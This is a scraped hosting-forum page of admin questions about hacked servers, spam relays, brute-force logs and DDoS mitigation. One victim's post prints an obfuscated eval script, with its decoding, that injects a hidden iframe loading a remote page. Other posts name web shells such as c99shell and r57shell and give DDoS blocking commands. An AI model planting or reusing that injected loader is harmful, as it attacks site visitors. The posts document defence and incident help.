To Prevent Local Hack
I try to enhance my server security and prevent local hack but it seem useless.
I tried to chmod home/user/public_html to 711; disable functions; enable php open_basedir.
I can stop some popular shell such as c99shell.php but server can be hacked local.
Anyway to prevent it completely?
View Complete Thread with Replies
Sponsored Links:
Related Forum Messages:
How To Limit Sockets To Prevent Hack (logs Provided)
TCP 67.228.85.130:2848 212.158.153.66:4925 ESTABLISHED TCP 67.228.85.130:2848 212.158.153.66:4926 ESTABLISHED TCP 67.228.85.130:2848 212.158.153.66:4929 ESTABLISHED TCP 67.228.85.130:2848 212.158.153.66:4930 ESTABLISHED there are 5000's of 212.158.153.66 connecting to 67.228.85.130:2848 how to limit 212.158.153.66 to like max of 30 connecting to 67.228.85.130:2848
View Replies!
View Related
How To Prevent Spoofing From Postfix/local Part
I have similar problem that explained [url] The detail of my problem is below: Some people sent spoofing mails from our mail users sent to our user from Postfix/local that is listed in maillog like below: Apr 29 16:57:02 ns1 postfix/local[3075]: EC2153565E3: to=<user-mydomain.com@ns1.mydns.com>, orig_to=<user@mydomain.com>, relay=local, delay=486, status=sent (delivered to command: /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME) Bu i do not know how to prevent this people not to use my Postfix/local delivery part. How can i prevent this attack? When i connect to my mail server to sent or receive my mail it look like Apr 29 17:25:28 ns1 dovecot: pop3-login: Login: user=<user@mydomain.com>, method=PLAIN, rip=***.***.***.***, lip=***.***.***.*** .... Apr 29 17:25:55 ns1 dovecot: POP3(user@mydomain.com): Disconnected: Logged out top=0/0, retr=0/0, del=0/0, size=0.... But the attackers connect directly like below: Apr 29 17:29:59 ns1 postfix/local[2456]: 3192E357FD9: to=<user-mydomain.com@ns1.mydns.com>, orig_to=<user@mydomain.com>, relay=local, delay=261, status=sent (delivered to command: /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME) .... Apr 29 17:29:59 ns1 postfix/qmgr[2218]: 3192E357FD9: removed How can the spammer connect to Postfix/local part? My mail server not open relay. i test it from internet.
View Replies!
View Related
Hack
recently i found that a javascript code is appended to my index.aspx file on the server ! here is the code : Code: <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c% 69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%34%39%61%30%36%30%34%33%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75% 6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%31%30%38%34%29%2b%27%35%32%30%62%33%36%35%30%33%5c%27%20%77%69%64%74%68%3d%37% 36%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64% 69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d% 65%3e%27%29")); </script> and this is the decoded one : Code: window.status='Done';document.write('<iframe name=749a06043a src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31084)+'520b36503' width=76 height=409 style='display: none'></iframe>') i need to know 2 things : 1- is it possible that my developer did something wrong and hackers can append anything to his code ? . or it is a server issue and my host provider servers hacked !? 2- does anybody know anything about this piece of code ? (i dont mean it's action , i want to know ! is it known ?)
View Replies!
View Related
Are They Going To Hack Me
When I check statistics for my site, I got this link: [url] When I click on this site, it run very strange. Are they going to hack me or what they want to do with my site by using the scripts on their site? after checking this: [url]
View Replies!
View Related
Possible Hack
I have searched and searched but can't find anything related here, on Cpanel.net or through google. I have a Linux/Cpanel machine. Hosts about 15-20 websites. No matter which site you try to visit it is redirected to some malware site or something that tries to get you download a program (Clearly a virus or trojan). I cannot find any info on this or how to even stop the redirects.
View Replies!
View Related
Someone From The Planet Trying To Hack In
My firewalls block IP's from multiple failed login attempts. The FW on one server has been blocking someone from The Planet. My servers are at GNAX, so why is someone from TP trying to get in? This is what the system emails tell me: IP: 70.87.XX.X (2.27.XXXX.static.theplanet.com) Failures: 5 (sshd) Interval: 95 seconds Blocked: Yes
View Replies!
View Related
Hack Attempt
I have started seeing the following error in the Event Viewer every day: "An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day." The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?
View Replies!
View Related
How Do I Un-hack My Site
I haven't really delved into it yet but my wife and I have a personal website with pictures and what-not which was hacked by some Saudi Arabian hacker site is www.nickandkathi.com I dont' have the index files with me but is all Ineed to do just re-load my index page on my PC to my file? I'm hosted with hostgator. How do I stop this from happening again?
View Replies!
View Related
Someone Try To Hack My Password
May 28 16:23:06 server sshd(pam_unix)[13017]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root I got so many of this line in my server log. First of all, where is the server log located anyway? I got this from SIM. May 28 16:23:09 server sshd(pam_unix)[13037]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13045]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13061]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13066]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13067]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13071]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 17:00:02 server ntpdate[19626]: adjust time server 192.5.41.40 offset 0.343837 sec May 28 18:00:07 server ntpdate[28711]: adjust time server 192.5.41.40 offset 0.344493 sec May 28 19:00:06 server ntpdate[3218]: adjust time server 192.5.41.40 offset 0.342326 sec May 28 20:00:02 server ntpdate[8283]: adjust time server 192.5.41.40 offset 0.341603 sec May 28 21:00:07 server ntpdate[13899]: adjust time server 192.5.41.40 offset 0.343715 sec May 28 21:37:45 server sshd(pam_unix)[17268]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17271]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17270]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17254]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root
View Replies!
View Related
Client Threatning To Hack
I just had a client whose hosting account was automatically suspended due to him not paying the hosting bill. He opened up a ticket and asked why his site is suspended. I informed him that he didn't pay the bill and the system suspended it automatically. I told him that the system generated e-mails as well and he said he didn't get them while I looked in WHCMS, it said it DID get sent to him. Client said his website was DDOS'd because it used 3 GB of BW in one month and i told him there was no DDOS attack. The kind of site he had (100+ users online at one time, vBulletin forum), it was common to use that much. The client is now saying that he is going to hack attempt the servers to see if they are DDOS Protected or not. Of Course, my servers are protected (WiredTree), so should I be worried? His quote: Quote: I'LL TEST TO SEE IF YOU HAVE DDOS PROTECTION...TIME TO GATHER MY HACKING BUDDYS. Also, I have notified WiredTree about this just right now.
View Replies!
View Related
Possible Root Level Hack
I believe my server has been hacked as I did the top and observe as follows top - 15:53:39 up 12 days, 3:16, 2 users, load average: 7.87, 10.30, 11.10 Tasks: 789 total, 3 running, 771 sleeping, 0 stopped, 15 zombie Cpu(s): 20.4% us, 9.3% sy, 4.8% ni, 35.0% id, 30.1% wa, 0.4% hi, 0.0% si Mem: 2074364k total, 2048296k used, 26068k free, 72136k buffers Swap: 2040244k total, 2076k used, 2038168k free, 1286884k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 22488 root 27 12 3376 1352 508 R 16.8 0.1 12:08.63 rsync 15370 named 20 0 84020 30m 1936 S 4.2 1.5 20:15.72 named 16732 root 16 0 4684 1456 868 S 2.9 0.1 0:01.07 ftp 22489 root 27 12 5444 1860 1420 R 2.9 0.1 3:27.51 ssh 26448 mailnull 17 0 9016 4088 2832 D 2.9 0.2 0:00.11 exim 26436 mailnull 16 0 0 0 0 Z 2.4 0.0 0:00.09 exim <defunct> 477 root 15 0 0 0 0 D 2.1 0.0 217:34.28 kjournald 26408 mailnull 16 0 8964 4584 3244 D 2.1 0.2 0:00.08 exim 26442 mailnull 16 0 0 0 0 Z 2.1 0.0 0:00.08 exim <defunct> 16975 root 15 0 4684 1444 856 S 1.6 0.1 0:00.56 ftp 23071 root 16 0 3760 1420 764 R 1.6 0.1 0:05.08 top 26477 root 16 0 8616 3892 2656 D 1.6 0.2 0:00.06 exim 26486 root 15 0 9420 3888 2656 D 1.3 0.2 0:00.05 exim 16694 root 15 0 4684 1436 848 S 1.0 0.1 0:00.63 ftp 16840 root 15 0 4684 1448 860 S 1.0 0.1 0:00.43 ftp 16865 root 15 0 4684 1444 856 S 1.0 0.1 0:00.72 ftp 16932 root 15 0 4684 1444 856 S 1.0 0.1 0:00.42 ftp 17275 root 15 0 4684 1448 860 S 1.0 0.1 0:00.57 ftp 26434 mailnull 16 0 8972 3956 2704 D 1.0 0.2 0:00.04 exim 26437 mailnull 15 0 8964 3920 2688 D 1.0 0.2 0:00.04 exim 26451 mailnull 15 0 8968 3932 2696 S 1.0 0.2 0:00.04 exim 26489 root 18 0 10568 3912 2656 S 1.0 0.2 0:00.04 exim 5310 root 15 0 40104 35m 1888 S 0.8 1.8 10:55.77 tailwatchd 16771 root 15 0 4684 1448 860 S 0.8 0.1 0:00.44 ftp 16779 root 15 0 4684 1448 860 S 0.8 0.1 0:00.56 ftp 16806 root 16 0 4684 1444 856 S 0.8 0.1 0:00.71 ftp 16844 root 15 0 4684 1440 852 S 0.8 0.1 0:00.57 ftp 16854 root 15 0 4684 1444 856 S 0.8 0.1 0:00.72 ftp 16857 root 15 0 4684 1444 856 S 0.8 0.1 0:00.63 ftp 16868 root 15 0 4684 1448 860 S 0.8 0.1 0:00.79 ftp 16885 root 15 0 4684 1448 860 S 0.8 0.1 0:00.68 ftp 16982 root 15 0 4684 1440 852 S 0.8 0.1 0:00.40 ftp 17008 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp 17038 root 15 0 4684 1448 860 S 0.8 0.1 0:01.01 ftp 17082 root 15 0 4684 1448 860 S 0.8 0.1 0:00.71 ftp 17106 root 15 0 4684 1444 856 S 0.8 0.1 0:00.84 ftp 17288 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp Now..I am logged in root in two terminals and it shows root pts/2 Apr 28 15:19 (x.x.x.x) root pts/3 Apr 28 14:06 (x.x.x.x) I am just wondering how can the root perform ftp tasks where my root login is sitting idle and what about pts/0 and pts/1 I stopped the ftp service in cpanel and it is started automatically..
View Replies!
View Related
What's Your Take On This Email Hack Scenario
I'm not a server admin, but help my client with basic it tasks...we built their website for them and just sort of fell into helping them out when they need it. My client has a vps with knownhost, the vps is only used for hosting the email for their domain, the website is hosted on another server. 4 days ago, I logged in and checked the mail queue and found thousands of emails in the queue that were phishing emails trying to get passwords from the recipients for a service called moneybookers.com. According to knownhost, the hacker had guessed the password of one of the email accounts and had started sending mail through it. The hacked account was deleted that day as it was a test account and was not needed anyways. As soon as the account was deleted, the phishing mails stopped being sent. Knownhost reassured us the server hadn't been breached, but we changed the root password anyways. Around 15k to 20k emails were sent in a 14 hour period. Since that time we have appeared on a few blacklsts and have a negative senderbase score and so any company that uses senderbase is obviously rejecting our mail... My client has just hired assuretymail services to get accredited and has invested a lot of money into streamlining mail delivery, so this is obviously devastating to them. Today I logged in and again found 1000's of email in queue, yet again, and this time they were paypal phishing emails. I immediately changed the passwords of all 50 of the email accounts, including the root. It looks like around 14k or so emails were sent. Trying to understand how this could happen yet again, knownhost is saying that, yet again the account "test", the same account used last time was used for sending out emails. I was confused by how a previously deleted account could be used to again begin sending emails even though it was deleted 4 days ago. According to knownhost "[FONT='Verdana','sans-serif']The only reasonable explanation for this activity would be that exim cached credentials for system user "test" and didn't refresh its internal cache since the moment when "test" account was removed. To force exim to refresh the cache exim mail server was restarted on your system, so it shouldn't be possible to use that (non-existent) account again to relay the mail through your system."[/FONT] [FONT='Verdana','sans-serif'][/FONT] [FONT='Verdana','sans-serif']Being that I'm not a server admin and I rely on knownhost for server admin basics, am I out of line thinking that knownhost dropped the ball here? I mean is it obvious that a restart was in order after the first hack or is this just a bad chance scenario. Is the scenario they are describing plausible?[/FONT]
View Replies!
View Related
Physical Hack Of My Server
Physical hack of my server? My server (cent OS4, plesk 8) was frozen for a day and the NOC had to reboot it, here is the mail I got from my host: >Your server was frozen, with a kernel panic. Ensure that you check your logs closely to determine how this happened, After looking at the message log here is the part of the log when the crash happened: Is this really a kernel panic, I am not sure... Dec 8 09:05:36 server kernel: input: AT Translated Set 2 keyboard on isa0060/serio0 Dec 8 09:05:37 server hal.hotplug[2701]: DEVPATH is not set Dec 8 09:05:37 server hal.hotplug[2702]: DEVPATH is not set Dec 8 09:05:42 server login(pam_unix)[2670]: bad username [ ] Dec 8 09:05:42 server login[2670]: Authentication started for user Dec 8 09:05:44 server login[2670]: FAILED LOGIN 1 FROM (null) FOR , Authentication failure Dec 8 09:05:50 server login(pam_unix)[2670]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost= user=root Dec 8 09:05:50 server login[2670]: Authentication started for user root Dec 8 09:05:53 server login[2670]: FAILED LOGIN 2 FROM (null) FOR root, Authentication failure Dec 8 09:05:57 server login(pam_unix)[2671]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty2 ruser= rhost= user=root Dec 8 09:05:57 server login[2671]: Authentication started for user root Dec 8 09:05:59 server login[2671]: FAILED LOGIN 1 FROM (null) FOR root, Authentication failure Dec 8 09:06:00 server shutdown: shutting down for system reboot Dec 8 09:06:00 server init: Switching to runlevel: 6 ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ Dec 9 05:52:36 server syslogd 1.4.1: restart. It looks to me like if someone has physically connected a keyboard and logged in at the NOC. I use Iptable to restrict ssh access to my IP each time I connect remotly, so I dont' think a remote connection has been possible. any idea about this line: ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ I think it's just corupted data the was written when the server shutt down. Also i didn't find any other signes of kernel panic in the logs Looking at the httpd error log I found this lines before the crash: [Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind [Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind apparently somone doing server scan. maybe the 2 events are correlated and the server freeze could have been a result of some buffer overflow attack, but i sould be finding some evidences of this on the apache logs? What direction should I take to investigate a bit further on this server freeze?
View Replies!
View Related
Figuring This Hack Attack Out
My company website URL is something along these lines: (I won't give the full URL because I guess that would be classed as advertising.) www dot olapXXXXXX dot com Now, we've discovered today that there are links on the site that look like this: www dot olapXXXXXXdotcom/pornsex.dhtml These links and pages have not been created by us. The link foes to a page advertising various porn, poker, viagra sites etc. I've checked the FTP and the pages do not seem to be on the server. So I'm a little bemused and stuck! How did someone piggyback on our site in this way? The pages are indexed in Google so if you do a search for our company name and 'strip poker' then the link shows up in Google. Does anyone have any idea what's going on? We own the URL, we don't believed our password has been compromised, the domain has not expired. I think perhaps it's something to do with DHTML? We don't use it but all the bad pages do. The links are not accessible from any of our pages (as for as I can see) but it's still a problem because they show up in Google.
View Replies!
View Related
Notifying DC Of Hack Attempt
Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place? Is this stuff largely ignored? Is anyone else doing this? Is there an easier way?
View Replies!
View Related
Hack Attempt? I'm Pretty Sure...
A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this? The account has been susspended for the time being.
View Replies!
View Related
Secure VPS After Many Hack Attacks
my VPS provider just rebuilt my VPS after many hack attacks. From some days I am getting emails from firewall that someone login to my VPS/mySQL using SSH. I don't know what they do, but they don't disturb any account. Only some downtime feel during this. But last night my VPS stop working so my provider rebuilt VPS. how I can secure my VPS now. I have Cpanel installed.
View Replies!
View Related
CPU Quota Hack Program
A hack program (i do not know what its name is) cause following error via vBulletin or any forum Code: This Account Has Exceeded Its CPU Quota i do not know how i can find out accesing ip and block access request and i do not know its runining system ? i m in shared host (have SSH account)
View Replies!
View Related
Lfd Warning: Hack Attempt Or Legit
Code: Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser ] - Suspicious directory The 'someuser' is a legitimate user on the server, an auto body website setup last October. The content of the directory: Quote: root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh total 3.0K drwx------ 2 someuser someuser 1.0K May 16 17:54 ./ drwx------ 3 someuser someuser 1.0K May 16 17:54 ../ -rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm File content: Code: $CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan"; $CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build"; $CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile"; $CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources"; 1; __END__ Code: root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh total 3.0K drwx------ 2 someuser someuser 1.0K May 16 17:54 ./ drwx------ 3 someuser someuser 1.0K May 16 17:54 ../ -rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions
View Replies!
View Related
Index.php Not Working After Hack Attempt
I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH. We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php". We updated all the services, rebuild apache but don't working. We can't use any index.php on the server. Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )
View Replies!
View Related
How To Prevent Rm -rf /
Does anyone know anyway that "rm -rf /" can be disabled? OR any selinux rule or something to prevent this? Or if I wanted to prevent a certain directory from being deleted like backups but something unlike chattr that someone can figure out quickly. Im sure LOTS of people would like to know about this. Ive searched around and only somewhat useful thing I have found is an rm wrapper that sends everything to a trash file in the root of the mount point.
View Replies!
View Related
Prevent Phishing
I'm not that techy I'd like to ask why this person downloaded the file below before uploading some phishing webpages on my account ? I've changed my password numerious times from different computers and even from mobile phone just to check if the person can still get in. But again it is no use the person were able to upload phishing pages. logs: May 25 21:50:42 server100 pure-ftpd: (weblogin100@62.56.133.36) [NOTICE] /home/weblogin100//.htpasswds/update/Login.php downloaded (21251 bytes, 755.78KB/sec) Right now I deleted all other scripts on the account and remain some htmls. Folder were also set to 644 no 777, while waiting if the person can still upload his phishing pages please help me why he downloaded the file above. I've check the file on my account and I cannot see Login.php. By the way I have a root login and only two accounts were a constant phishing victims.
View Replies!
View Related
How Prevent Hackers Away
I am giving few tips on securing your server against hack attempts. You must check these inspite of other securities like firewall, rootkits detectors etc. 1. Most Important, do not disable safe_mode under php.ini. If any customer asks to disable it, turn it off on his account only, not on whole server. As most of the time attack is done using shellc99 (phpshell) script. In case safe_mode is off on server and there are public dirs with 777 permission, he can easily hack through. 2. Compile apache with safe mode as well. 3. In cpanel under tweek settings, turn on base_dir, if someone requests to turn off, turn it off on his/her account only. As using phpshell one can easily move to main server dirs like /etc, /home. 4. Do not allow Anonymous Ftp on your server. You can turn it off from ftp config under WHM Service Configuration. If its allowed, one can easily bind port using nc tool with your server and gain root access. Always keep it disabled. 5. Make sure /tmp is secured. You can easily do that by running this command /scripts/securetmp using ssh. But do make sure, /tmp is secured. Else one can upload some kind of perl script in /tmp dir and can deface or damage all data on the few/all accounts on your server. keeping your server secure from hack attempts.
View Replies!
View Related
How To Prevent Nobody To Move In Server
i have my own box for my forum .. now i shared my box with friend's , but in reall they a freak friend's , just to be in safe brother, am looking to know what function i can disable in php.ini or any problem/tool to prevent anybody / attacker * nobody* permission to move in the server via his shell script.. as we know some attacker's use them own php-shell to hack site's * shared hosting *, so they can move to any account after they know the user account name * /etc/passwd * .. so as i say before is there any good functions to prevent these attacker to move in the server? so i can disable it .. or install any good tool * else modsecurity * in the system to prevent them *nobody* of that?
View Replies!
View Related
Mod_security To Prevent Some Script
I try to use mod_security to prevent some script in some files, imagine I want to block all scripts includes "test" in the body so if code of script.php is: HTML Code: <html> <p>test</p> </html> and someone run script.php , I want block running and show 406 error now can you tell me how can I write this rule in mod_security 2 with apache 2? I use SecRule RESPONSE_BODY "test" but its now working ...
View Replies!
View Related
What Can I Do To Prevent DDoS Attack
My site was recently under a DDoS attack and was down for a few days, the attack came from Russia i believe. The people who did it asked for $800, but of course i didnt pay. My hosting company did the best they could in order to stop the attack but it still lasted a few days and badly hurt my rankings. I moved my site to a dedicated server, but i dont know what kind of software/hardware i need to install on it in order to prevent more future attacks, the hosting company suggested a few things but i dont know if they are just trying to get more money out of me.
View Replies!
View Related
Prevent Directory Listing
I've just made a transition from a VDS to a Dedicated and I'm having problems preventing directory contents from showing. In my previous server whenever I created a directory, it would automatically give a 403 when you tried to access the directory directly in your browser (which is what I want). Now when I set up directories in this new dedicated the contents of the directories display when there is either no index page or if I didn't have an htaccess file preventing it from listing the contents. So what im asking is how did my previous server automatically set up the directories to not display the contents but use the contents and allow access to say for example pictures in the directory? Is there a way I can have apache automatically do this for me or do I have to place a blank index page in every directory i create or have to place an htaccess file in every directory I create? How can I protect the contents with a 403 but still allow the contents to be accessed only through full path?
View Replies!
View Related
My Server Was Hacked -- How To Prevent This
My server was recently hacked and I'm looking ways to secure it in the future. I use the server to host my own websites. It was hacked to be a spam server. I traced the new files the hackers added to my "upload" directory, which is where my site members upload pics. I had set the directory to chmod 777. Could someone hack that directory solely from it being its rights being 777? The site was custom developed in PHP, and looking through it myself, I couldn't find any security issues. But then again, I may not know what exactly to look up. I would appreciate any general tips to protecting a server, as well as general tactics hackers use to hack a server and PHP site.
View Replies!
View Related
Way To Prevent Iframe Attack
some sites on my server is inserted iframe code to its homepage index.php and index.html I found this topic is discussed on WHT for sometimes but no solution yet. I found a article help to solve this issue but i am lack of knowledge to understand the article. [url]
View Replies!
View Related
How To Prevent DDoS Attacks CentOS
I believe that my site is being DDoSed against, and I'm wondering how I can prevent this from happening. I'm running CentOS 5.3. Are there any server side scripts of PHP scripts that could be used to dynamically block out IP's that are consuming too many resources on the VPS?
View Replies!
View Related
Check And Prevent Ddos Attack
While working with different issues, I have seen that many clients complaining about ddos attack on their server. So, I am posting here some useful commands to check and prevent ddos attack. First of all when you see that your site's or server speed is very slow even though there is not much load on your server, you can guess it might be ddos. Then run 'top' command and see which processes is more, if those are httpd then fire following command which will show how many active connections your server is currently processing. netstat -n | grep :80 | wc -l netstat -n | grep :80 | grep SYN |wc -l The first command will show the number of active connections that are open to your server. The number of active connections from the first command is going to vary widely but if you are much above 500 you are probably having problems.If the second command is over 100 you are having trouble with a syn attack. netstat -anp |grep ‘tcp|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n That will list the IPs taking the most amounts of connections to a server. use follwoing command to block a ip with iptables on server iptables -A INPUT 1 -s IPADRESS -j DROP/REJECT service iptables restart service iptables save --------OR--------------- You can place ip's which you want to block in hosts.deny vi /etc/hosts.deny httpd: IP write and quit --------------------------- Then KILL all httpd connection and restarted httpd service by using following command killall -KILL httpd service httpd startssl ----------------------------------- This are all the step to check and prevent ddos on your server.
View Replies!
View Related
How To Prevent Staff Steal Our Site
Become my attention when we hire company/people to handle our server due our knowledge about manage dedicated server is low level and we run big site on that server. Anybody know about tips how to prevent staff from managed service steal our site,even they has been trusted and handled hundred or thousand servers.As we know when we hired them for full managed service,they have our root access.
View Replies!
View Related
How To Prevent Email To Root Account
I'm running a webosting server under linux with sendmail as mailserver. The problem is that many spammers send mails directly to the root account by using one of the existing pseudo accounts like "apache, uucp, root, ...". In a default sendmail installation, apache, uucp, root are defined as alias and point to root. I do virtualhosting so I accept mail for several domains. If a spammer send mail to root@anotherdomain.com, the spam will also arrive in the root account. If I define a bounce all for my main domain, I have problems because root@mymaindomain.com and apache@mymaindomain.com do not exist anymore. This results in user unkown when apache or root try to send a mail out. So, how do I prevent spammers from sending mail directly to the root account? Is it possible to accept only local mail to the root account?
View Replies!
View Related
Prevent .htaccess Override Of Upload_max_filesize Only
I'm having issues with users setting their upload_max_filesize, and post_max_size values in .htaccess in excess of 500M 1000M As a result their users are uploading and converting some huge files and pegging my cpu's. Is there a way to allow .htaccess override for all values except upload_max_filesize & post_max_size or perhaps there is another solution out there to limit .htaccess by user?
View Replies!
View Related
How To Prevent OOM (Out Of Memory) Crashes
I have a colocated server with the following specs: Intel Core 2 Quad Q6600 2.4Ghz 4GB RAM 400GB SATA Drive I have a problem every few days, the server keeps hanging up and giving an "Out of Memory" message and SSH just hangs and doesn't connect. Every time i have to call out a tech to manually reboot it. Is there a setting i can change to make SSH connect even when it is out of memory, or anything that can prevent it happening?
View Replies!
View Related
Reseller Using More Space Than He Is Allowed... How To Prevent That
I went into Reseller center this morning and clicked "View Usage/Stats and Manage (suspend,terminate,etc)" to find out that for that specific reseller: Disk Space Used in Meg: 6323.02 Disk Space Limit: 4662 How is that possible? I went back and clicked "Edit Privileges/Nameservers", Resource Usage Limits|| Resource Max Allowed ||| Overselling Allowed Disk Space MB* ||||||| 5000 ||||||||||||||||| NOT CHECKED Bandwidth MB* ||||||| 200000 ||||||||||||||| NOT CHECKED (Sorry if my table is a bit crooked) My reseller was able to go over the limit I have setup for him.. Should'nt he have a message that he cannot go over the limit or something preventing him of going over 5000 megs?
View Replies!
View Related
How To Prevent Customer From Using PHP Scripts
Is there a way that I can prevent certain customers from using PHP scripts with their account? For example, I'm planning to offer some free hosting accounts (along with paid ones) but do not plan to allow PHP or Perl scripts with the free accounts as I'm worried about the server being exploited. (That could also happen with paid accounts but less likely.)
View Replies!
View Related
|
TRACKER
